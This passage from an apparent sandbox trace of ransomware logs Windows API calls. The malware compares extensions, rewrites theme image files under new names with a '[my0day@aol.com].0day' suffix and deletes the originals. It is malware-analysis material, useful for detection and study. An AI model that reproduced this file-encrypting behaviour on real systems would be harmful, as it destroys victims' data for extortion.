Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.312] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.312] lstrlenW (lpString=".doc") returned 4 [0047.312] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.312] lstrlenW (lpString=".docx") returned 5 [0047.312] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.312] lstrlenW (lpString=".pdf") returned 4 [0047.312] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.312] lstrlenW (lpString=".xls") returned 4 [0047.313] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.313] lstrlenW (lpString=".xlsx") returned 5 [0047.313] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.313] lstrlenW (lpString=".ppt") returned 4 [0047.313] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.313] lstrlenW (lpString=".zip") returned 4 [0047.313] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.313] lstrlenW (lpString=".rar") returned 4 [0047.313] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.313] lstrlenW (lpString=".bz2") returned 4 [0047.313] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.313] lstrlenW (lpString=".7z") returned 3 [0047.313] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.313] lstrlenW (lpString=".dbf") returned 4 [0047.313] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.313] lstrlenW (lpString=".1cd") returned 4 [0047.313] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0047.313] lstrlenW (lpString=".jpg") returned 4 [0047.313] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.313] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.313] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.314] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=29305) returned 1 [0047.314] CloseHandle (hObject=0x190) returned 1 [0047.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 0x20 [0047.314] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.314] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.314] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.314] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.315] GetLastError () returned 0x0 [0047.315] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x7279, lpOverlapped=0x0) returned 1 [0047.317] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x7280, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x7280, lpOverlapped=0x0) returned 1 [0047.318] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.318] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.318] SetEndOfFile (hFile=0x194) returned 1 [0047.318] CloseHandle (hObject=0x194) returned 1 [0047.319] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.319] SetEndOfFile (hFile=0x190) returned 1 [0047.319] CloseHandle (hObject=0x190) returned 1 [0047.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.320] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\thmbnail.png")) returned 1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.320] lstrlenW (lpString=".doc") returned 4 [0047.320] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.320] lstrlenW (lpString=".docx") returned 5 [0047.320] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.320] lstrlenW (lpString=".pdf") returned 4 [0047.320] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.320] lstrlenW (lpString=".xls") returned 4 [0047.320] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.320] lstrlenW (lpString=".xlsx") returned 5 [0047.320] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.320] lstrlenW (lpString=".ppt") returned 4 [0047.320] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.320] lstrlenW (lpString=".zip") returned 4 [0047.320] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.320] lstrlenW (lpString=".rar") returned 4 [0047.320] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.320] lstrlenW (lpString=".bz2") returned 4 [0047.321] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.321] lstrlenW (lpString=".7z") returned 3 [0047.321] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.321] lstrlenW (lpString=".dbf") returned 4 [0047.321] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.321] lstrlenW (lpString=".1cd") returned 4 [0047.321] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.321] lstrlenW (lpString=".jpg") returned 4 [0047.321] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.321] lstrlenW (lpString=".doc") returned 4 [0047.321] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.321] lstrlenW (lpString=".docx") returned 5 [0047.321] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.321] lstrlenW (lpString=".pdf") returned 4 [0047.321] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.321] lstrlenW (lpString=".xls") returned 4 [0047.321] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.321] lstrlenW (lpString=".xlsx") returned 5 [0047.321] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.321] lstrlenW (lpString=".ppt") returned 4 [0047.321] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.321] lstrlenW (lpString=".zip") returned 4 [0047.321] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.321] lstrlenW (lpString=".rar") returned 4 [0047.321] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.321] lstrlenW (lpString=".bz2") returned 4 [0047.321] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.322] lstrlenW (lpString=".7z") returned 3 [0047.322] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.322] lstrlenW (lpString=".dbf") returned 4 [0047.322] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.322] lstrlenW (lpString=".1cd") returned 4 [0047.322] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 72 [0047.322] lstrlenW (lpString=".jpg") returned 4 [0047.322] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.322] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.322] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.322] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.323] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1009) returned 1 [0047.323] CloseHandle (hObject=0x190) returned 1 [0047.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 0x20 [0047.323] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.323] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.323] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.325] GetLastError () returned 0x0 [0047.325] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x3f1, lpOverlapped=0x0) returned 1 [0047.326] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x400, lpOverlapped=0x0) returned 1 [0047.327] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.327] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.327] SetEndOfFile (hFile=0x194) returned 1 [0047.328] CloseHandle (hObject=0x194) returned 1 [0047.328] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.328] SetEndOfFile (hFile=0x190) returned 1 [0047.328] CloseHandle (hObject=0x190) returned 1 [0047.329] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.329] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 1 [0047.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.329] lstrlenW (lpString=".doc") returned 4 [0047.329] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.329] lstrlenW (lpString=".docx") returned 5 [0047.329] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.329] lstrlenW (lpString=".pdf") returned 4 [0047.329] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.329] lstrlenW (lpString=".xls") returned 4 [0047.329] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.329] lstrlenW (lpString=".xlsx") returned 5 [0047.329] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.329] lstrlenW (lpString=".ppt") returned 4 [0047.329] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.329] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.330] lstrlenW (lpString=".zip") returned 4 [0047.330] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.330] lstrlenW (lpString=".rar") returned 4 [0047.330] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.330] lstrlenW (lpString=".bz2") returned 4 [0047.330] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.330] lstrlenW (lpString=".7z") returned 3 [0047.330] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.330] lstrlenW (lpString=".dbf") returned 4 [0047.330] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.330] lstrlenW (lpString=".1cd") returned 4 [0047.330] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.330] lstrlenW (lpString=".jpg") returned 4 [0047.330] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.330] lstrlenW (lpString=".doc") returned 4 [0047.330] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.330] lstrlenW (lpString=".docx") returned 5 [0047.330] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.330] lstrlenW (lpString=".pdf") returned 4 [0047.330] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.330] lstrlenW (lpString=".xls") returned 4 [0047.330] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.330] lstrlenW (lpString=".xlsx") returned 5 [0047.330] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.330] lstrlenW (lpString=".ppt") returned 4 [0047.330] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.330] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.331] lstrlenW (lpString=".zip") returned 4 [0047.331] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.331] lstrlenW (lpString=".rar") returned 4 [0047.331] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.331] lstrlenW (lpString=".bz2") returned 4 [0047.331] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.331] lstrlenW (lpString=".7z") returned 3 [0047.331] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.331] lstrlenW (lpString=".dbf") returned 4 [0047.331] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.331] lstrlenW (lpString=".1cd") returned 4 [0047.331] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.331] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.331] lstrlenW (lpString=".jpg") returned 4 [0047.331] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.331] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.331] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.331] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.331] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=27177) returned 1 [0047.332] CloseHandle (hObject=0x190) returned 1 [0047.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 0x20 [0047.332] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.332] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.332] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.332] GetLastError () returned 0x0 [0047.332] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x6a29, lpOverlapped=0x0) returned 1 [0047.384] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x6a30, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x6a30, lpOverlapped=0x0) returned 1 [0047.385] ReadFile (in: hFile=0x190, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.385] WriteFile (in: hFile=0x194, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.385] SetEndOfFile (hFile=0x194) returned 1 [0047.386] CloseHandle (hObject=0x194) returned 1 [0047.386] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.386] SetEndOfFile (hFile=0x190) returned 1 [0047.387] CloseHandle (hObject=0x190) returned 1 [0047.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.387] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\thmbnail.png")) returned 1 [0047.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.387] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.387] lstrlenW (lpString=".doc") returned 4 [0047.387] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.387] lstrlenW (lpString=".docx") returned 5 [0047.387] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.387] lstrlenW (lpString=".pdf") returned 4 [0047.387] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.387] lstrlenW (lpString=".xls") returned 4 [0047.387] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.388] lstrlenW (lpString=".xlsx") returned 5 [0047.388] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.388] lstrlenW (lpString=".ppt") returned 4 [0047.388] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.388] lstrlenW (lpString=".zip") returned 4 [0047.388] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.388] lstrlenW (lpString=".rar") returned 4 [0047.388] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.388] lstrlenW (lpString=".bz2") returned 4 [0047.388] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.388] lstrlenW (lpString=".7z") returned 3 [0047.388] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.388] lstrlenW (lpString=".dbf") returned 4 [0047.388] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.388] lstrlenW (lpString=".1cd") returned 4 [0047.388] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.388] lstrlenW (lpString=".jpg") returned 4 [0047.388] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.388] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 74 [0047.388] 